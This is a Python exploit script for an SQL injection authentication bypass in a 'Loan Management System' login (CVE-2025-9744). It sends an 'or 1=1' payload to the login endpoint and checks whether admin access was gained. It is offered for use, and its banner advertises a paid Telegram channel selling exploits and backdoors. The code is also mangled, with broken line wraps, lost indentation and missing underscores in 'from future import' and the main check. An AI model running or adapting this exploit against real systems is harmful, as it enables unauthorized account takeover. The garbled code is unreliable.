# -*- coding: utf-8 -*-
# Exploit [Loan Management System] v1.0 - SQL Injection
# Google Dork: N/A
# Date: 20/10/2025
# Exploit Author: CodeB0ss
# Vendor: Loan Management System
# Software Link: https://www.loanpro.io/
# Version: <= 1.0.0
# Tested on: Windows
# CVE : CVE-2025-9744
# CVSS Score : 10

from future import print_function
import requests
import sys

banner = '''

-#-
bY t.me/uncodeboss

CVE-2025-9744 => [Loan Management System] v1.0 - SQL Injection

[Notification] : Become a VP user and get all the exploits and tools,
backdoors
t.me/realcodeb0ss . 35% Discount Prefer Code : 9QzkLw

[Usage] :
python CVE-2025-9744.py -u http/https or just example.com.

'''

try:
requests.packages.urllib3.disable_warnings()
except:
pass

def codeb0ssexp(codeb0ss_base):
if not codeb0ss_base.startswith("http://") and not
codeb0ss_base.startswith("https://"):
codeb0ss_base = "http://" + codeb0ss_base
base_url = codeb0ss_base.rstrip("/")

cdb0s = requests.Session()
cdb0s.headers.update({
'User-Agent': 'Mozilla/5.0 (https://t.me/realcodeb0ss) Gecko/20100101
Firefox/113.0',
'Content-Type': 'application/x-www-form-urlencoded'
})
red = "\033[91m"
green = "\033[92m"
post_path = "/ajax.php?action=login"
get_path = "/index.php?page=home"
post_url = base_url + post_path
get_url = base_url + get_path
username = "admin'+or+'1'%3D'1'%23"
password = "expbycodeb0ss"
payload = "username={}&password={}".format(username, password)

try:
r_post = cdb0s.post(post_url, data=payload, timeout=10, verify=False)
r_get = cdb0s.get(get_url, timeout=10, verify=False)
try:
combined = (r_post.text or "") + (r_get.text or "")
except Exception:
combined = (r_post.content or "") + (r_get.content or "")
group1 = ["window.start_load", "Welcome back Admin", "Loan Management
System"]
group1_ok = all(w in combined for w in group1)
group2_ok = ("login-form" in combined)
if group1_ok and group2_ok:
print(" - " + base_url + " --> " + green + "Vulnerable")
print(" - {}".format(post_url))
print(" - {}".format(get_url))
return 0
else:
print(" - " + base_url + " --> " + red + "Not_Vulnerable")
return 2
except requests.exceptions.RequestException as e:
print(" - " + base_url + " --> " + red + "Time0ut")
return 1
def startexp():
if '-u' in sys.argv:
idx = sys.argv.index('-u')
if idx + 1 < len(sys.argv):
return sys.argv[idx + 1]
return None
def main():
print(banner)
target = startexp()
if not target:
sys.exit(1)

rc = codeb0ssexp(target)
sys.exit(rc)
if name == "main":
main()